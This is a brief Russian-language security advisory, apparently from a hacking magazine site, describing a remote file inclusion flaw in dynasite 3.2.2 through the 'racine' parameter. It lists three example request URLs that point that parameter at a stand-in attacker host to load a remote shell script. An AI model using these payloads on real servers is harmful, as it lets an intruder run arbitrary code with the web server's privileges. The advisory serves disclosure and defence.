Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: dynasite3.2.2
Уязвимость позволяет злоумышленнику выполнить произвольный сценарий на целевой системе.
Уязвимость существует из-за ошибки в обработке входных данных в параметре «racine» множественными сценариями. Атакующий может выполнить произвольный сценарий с привилегиями запущенного Web сервера.
Пример:
http://[target]/[path]/function_log.php?racine=http://evilsite.com/shell?
http://[target]/[path]/function_balise_url.php?racine=http://evilsite.com/shell?
http://[target]/[path]/connection.php?racine=http://evilsite.com/shell?